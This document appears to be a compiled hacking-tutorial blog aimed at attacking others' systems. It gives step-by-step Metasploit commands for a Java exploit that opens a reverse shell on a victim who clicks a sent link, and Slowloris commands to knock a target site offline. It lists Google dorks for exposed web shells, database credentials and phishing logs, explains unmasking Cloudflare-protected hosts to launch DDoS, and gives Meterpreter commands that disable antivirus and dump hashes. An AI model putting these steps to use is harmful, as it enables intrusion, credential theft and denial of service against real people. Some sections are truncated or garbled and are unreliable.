How to Hack targeted website(Basic)?

Today is the age of computer and internet. More and more people are creating their own websites to market their products and earn more profit from it. Having your own website will definitely help you in getting more customer purchasing your products but at the same time you can also also attract hackers to play around with your site. If you have not taken enough care to protect your site from hackers then your business can even come to an end because of these hackers.

Before you hack into a system, you must decide what your goals are. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is that you have to decide what the goal is first.

The most common goals are:

1. Breaking into the system & taking the admin privileges.

2. Gaining sensitive data, such as credit cards, identification theft, etc. - not recommended

You should have all of your tools ready before you start the next steps too hacking. There is a Linux version called Backtrack. It is an operating system that comes with various security tools that will help you break into systems.

You must decide how you are going to achieve your task. Plan. There is a common methodology followed by hackers, I will mention it below. However, you can create your own methodology if you know what you are doing.

Common steps to be taken for hacking a system:

1. Reconnaissance (footprinting)

2. Scanning

3. Ports & Services Enumeration

4. Vulnerability Assessment

5. Vulnerability Exploitation

6. Penetration and Access

7. Privilege Escalation & owning the box

8. Erase tracks

9. Maintaining access

How to exploit robots.txt?

What is robots.txt?

Robots.txt is a file that contain path which cannot crawled by bot most of time search-engine bots like google bot or etc. It tells search-engine that this directory is private & can not be crawled by them.

If yo are site owner & want to make robots.txt file , then go following link , it will create robots.txt file for you.

http://www.mcanerin.com/EN/search-engine/robots-txt.asp

so just for now , robots.txt is pretty much what websites use to block certain pages from search engines.

Here is a sample : http://www.whitehouse.gov/robots.txt

First method

Now this method is very rare & the web-master would have to be stupid to do this, but you'll be surprised how many stupid people there are in the world.

This one is simple, go to one of the disallowed directories & look in the source. Sometimes web-master leave comments there to give hints like passwords/ or user-names.

You never know you might find something juicy. :]

With this info you could possibly guess his password by entering some of the most infamous/best football teams.

How to POISONING ARP on network?

How to do Address Resolution Protocol (ARP) poisoning?

What Does ARP Mean?

Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communication

between local nodes can be made.

On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program is present. This program can be used to display and/or modify ARP cache entries.

An example of the "arp" utility's output would look like the following:

Windows:

> arp -a

Interface: 192.168.1.100 .- 0x10003

Internet Address Physical Address Type

192.168.1.1 00-13-10-23-9a-53 dynamic

Linux:

$ arp -na

? (192.168.1.1) at 00:90:B1C:F8:C0 [ether] on eth0

FreeBSD:

$ arp -na

? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0

How to use latest java vulnerability to hack remote p.c. ?

Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.

(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal

(2)Now after update type msfconsole

(3)type use exploit/multi/browser/java_jre17_jaxws

(4)set payload java/shell_reverse_tcp

(5)set lhost 223.232.185.97(your I.p)

(6)set srvhost 223.232.185.97(server I.p.)

(7)set uripath /

(8)exploit

Now an URL you should give to your victim http://223.232.185.97:8080/

Now send link to victim. When victim open your link, you have access of victim` s computer.

(9)type sessions -l

(10)the Session number to connect to the session. And Now Type sessions -i ID

How to crack any hash with help of online services?

How to crack any hash with help of online services?

findmyhash.py try to crack different types of hashes using free online services.
(1)Download it from here .
(2)Open terminal & change directory where you download tool , if we download tool in download folder then type in following command in terminal
cd Downloads
(3)python findmyhash.py

Accepted algorithms are:
MD4, MD5, SHA1, SHA256, RMD160, LM, NTLM, MYSQL, CISCO7 & JUNIPER
NOTE: for LM / NTLM it is recommended to introduce both values with this format:
python findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7
python findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

how to crack md5 hash in ubuntu?

If you have an password in md5 hash and you need password in plain text for this there is lot of tool and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like here.

We are using a perl script to crack an hash so we had encrypted an text "r2/." into a md5 hash which is "5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt it again with perl in a plain text.

So first of all here we already know the length of text is 4 and it is included with specail characters like ". /" etc so our job will be easy but if we dont know the length and what kind of character included in hash then what? no problem we have some solution for that too ok lets began with first step if u are using linux here we are using back track for this first of all you need perl script so donalod and follow the steps to crack a hash i will try to explain each part of this script

(1)Download perl script from here.

(2)Make it exexcutable.

(3)open terminal & change directory where you download script.

How to install & use SLOWLORIS in ubuntu?

(1)Open a browser and go to this URL: ‘http://ha.ckers.org/slowloris‘ (here you can know more about what is SLOWLORIS, & what it can do)

(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.

(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.

(4)Then type in your terminal:

sudo apt-get install perl-doc

and enter your password when prompted. This installs the Perl documentation module you’ll need to see the Slowloris help page. Wait while the packages download and install.

(5)Then type this command, (all in one line) and press enter:

sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl

(6)When ask yes/no type Y and press enter, this installs some libraries for Slowloris.

Again type another command, this time:

perldoc slowloris.pl

and hit enter. This will show the documentation for Slowloris. I usually type Crtl+X+Y=enter to save it as a record but if you like you can just scan it and type Crtl+X to get rid of it.

(7)Next you should type

sudo perl slowloris.pl -dns example.com -port 80 -test

hit enter and password if requested. This tests the server to see what it’s timeout window is. Wait until the test finishes, it will take several minutes. When it’s done it will tell you what timeout value to use….something along the likes of ‘Use 240 seconds for -timeout’.

(8)In the terminal window type,

sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5

This performs the actual attack, if your time out test told you to use another timeout value use that.

(9)In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users.

To stop the attack just type Ctrl+C.

Some cool Google Dork

Symlink dork.

Code:

inurl:/sym/root/ & intext:"Parent Directory"

c99shell dork.

Code:

inurl:(shell.php | c99.php) Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

c99shell dork(2).

Code:

inurl:(shell.php | c99.php) intitle:c99shell Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

WordPress MySQL details.

Code:

inurl:(wp-config.conf | wp-config.txt) ext:(conf | txt | config)

Databases username && passwords.

Code:

inurl:/includes/ & ext:inc & inurl:connect | inurl:dbconnect & -site:phpkode.com

Phish The Phisher

Code:

filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="

phpmyadmin exploit

Code:

allinurl:index.php?db=information_schema

Here is list of other google dork. Download here.

How to find person through its email-address?

How to find person through its email-address?

If you get email from unknown person and before giving reply to email, you want to find little information about that person , then you need reverse email-address lookup. Or someone who abuse you , & you want to trace person you should use reverse email-address lookup.

If person has website or listed his account in any public website then you can find information about use of search engine. But in most cases , person use fake email-address for communication.

(1)If person use any desktop client(like outlook,Evolution mail etc) to send email then you can trace his I.P. From email. But if he send from browser then you get location of his email provider. For example , person send email from gmail through web-browser then you get location of gmail server.

Open the header of the email message and look for lines that say “Received: from” followed by an IP address in square brackets. If there are multiple entries, use the IP address mentioned in the last entry.

Now paste the IP address in this trace route tool and you should get a fairly good idea about the location of the email sender.

HOW TO DO SQL INJECTION FROM LINUX?

Here is SQL injection tools for linux. It`s SQLMAP. Now if you have windows than you should use HAVIJ. You can find it`s tutorial here.

Main Features are as below

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

All these methods are based on bad admin configurations, but still are quite common

If you want to find real I.P. address of website, which is hidden by CLOUDFLARE. It has came to my attention that many booters, hosts, malicious websites, and more use CloudFlare for DDoS Protection & Anti-Abuse Report Protection. With CloudFlare protection, it is difficult to get the hosts IP; therefore, it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain any website protected by CloudFlare's real IP, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain , it will give i.p. which is not website`s real i.p. address. you should try following option to get real I.P. address of domain.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR
ping ftp.domain.com
             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

How to do SQL injection manually?

According to Wikipedia, SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

You can also do it by using some tools ,here we are doing without use of tools.

If you want to do easily with help of tools then read my previous tutorial using HAVIJ here .

Let us have a look at the contents of this tutorial..

Part One - Website Assessment

- Finding a vulnerable website

- Determining the amount of columns

- Finding which columns are vulnerable

Part Two - Gathering Information

- Determining the SQL version

- Finding the database

Part Three - The Good Part

- Finding the table names

- Finding the column names

- Displaying the column contents

- Finding the admin page

How To use Websploit?

Hey here is new tools which I found is WEBSPLOIT. First download WEBSPLOIT from here.

Now install it.
Installation process are as follow.

(1)First download WebSploit toolkit 
(2)Now unzip the file folder 
(3)Now change the permission of WebSploit file in WebSploit folder. Right click        on websploit file and select properties.
(4)Select the Permission tab and click on Allow executing file as program now     click on close
(5)now open your terminal & type
    cd /Downloads/web/websploit
    ./websploit

Now open terminal and type websploit.

How to do DNS SPOOF(tutorial)?

First What is the DNS ? (wikipedia.org)
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide. An often used analogy to explain the Domain Name System is that it serves as the "phone book" for the Internet by translating human-friendly computer hostnames into IP addresses. For example, http://www.example.com translates to208.77.188.166.
What does poisoning the DNS allow us to do ?
It allows us to redirect the traffic to another website.
First This is the structure of the network :

Some of the Cool Metasploit Metrepreter script

Getcountermeasure

Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.

Command:- run getcountermeasure

Getgui

getgui script is used to enable RDP on a target system.

Command:- run getgui -e

GetTelnet

gettelnet script is used to enable telnet on the victim.

Command:- run gettelnet -e

Winenum

Winenum script is used to dump tokens, hashes.

Command:- run winenum

Getlocalsubnet

getlocalsubnet script is used to get the local subnet mask of a victim.

Command:- run get local subnets

Killav

Killav used to disable most antivirus programs.

Command:- run killav

Checkvm

Checkvm used to see if you exploited a virtual machine.

Command:- run checkvm